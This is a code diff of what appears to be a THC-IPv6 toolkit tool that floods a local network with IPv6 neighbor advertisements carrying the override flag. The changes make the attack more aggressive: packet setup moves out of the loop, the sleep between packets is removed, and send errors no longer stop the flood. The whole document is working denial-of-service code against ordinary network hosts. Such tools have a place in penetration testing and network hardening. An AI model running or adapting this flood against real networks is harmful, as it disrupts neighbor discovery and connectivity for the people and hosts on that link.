@@ -10,13 +10,11 @@
 #include <pcap.h>
 #include "thc-ipv6.h"
 
-extern int debug;
-
 void help(char *prg) {
-  printf("%s %s (c) 2011 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s [-r] interface\n\n", prg);
+  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s interface\n\n", prg);
   printf("Flood the local network with neighbor advertisements.\n");
-  printf("Use -r to use raw mode.\n\n");
+//  printf("Use -r to use raw mode.\n\n");
   exit(-1);
 }
 
@@ -24,7 +22,7 @@ int main(int argc, char *argv[]) {
   char *interface, mac[6] = "";
   unsigned char *mac6 = mac, *ip6;
   unsigned char buf[24];
-  unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
+  unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst);
   int i;
   unsigned char *pkt = NULL;
   int pkt_len = 0, flags, rawmode = 0, count = 0;
@@ -55,6 +53,13 @@ int main(int argc, char *argv[]) {
   ip6[9] = mac[1];
   ip6[11] = 0xff;
   ip6[12] = 0xfe;
+  memset(buf, 0, sizeof(buf));
+  buf[16] = 2;
+  buf[17] = 1;
+  buf[18] = mac[0];
+  buf[19] = mac[1];
+  memcpy(buf, ip6, 16);
+  flags = ICMP6_NEIGHBORADV_OVERRIDE;
 
   printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
   while (1) {
@@ -69,25 +74,22 @@ int main(int argc, char *argv[]) {
     ip6[15] = mac[5];
 
     count++;
-    memset(buf, 0, sizeof(buf));
-    memcpy(buf, ip6, 16);
-    buf[16] = 2;
-    buf[17] = 1;
-    memcpy(&buf[18], mac, 6);
-    flags = ICMP6_NEIGHBORADV_OVERRIDE;
+    memcpy(buf + 10, ip6 + 10, 6);
+    memcpy(&buf[20], mac + 2, 4);
 
     if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0)
       return -1;
     if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
-      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
-      perror("");
-      return -1;
+//      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
+//      perror("");
+//      return -1;
+      printf("!");
     }
 
     pkt = thc_destroy_packet(pkt);
-    usleep(1);
+//    usleep(1);
     if (count % 100 == 0)
       printf(".");
   }
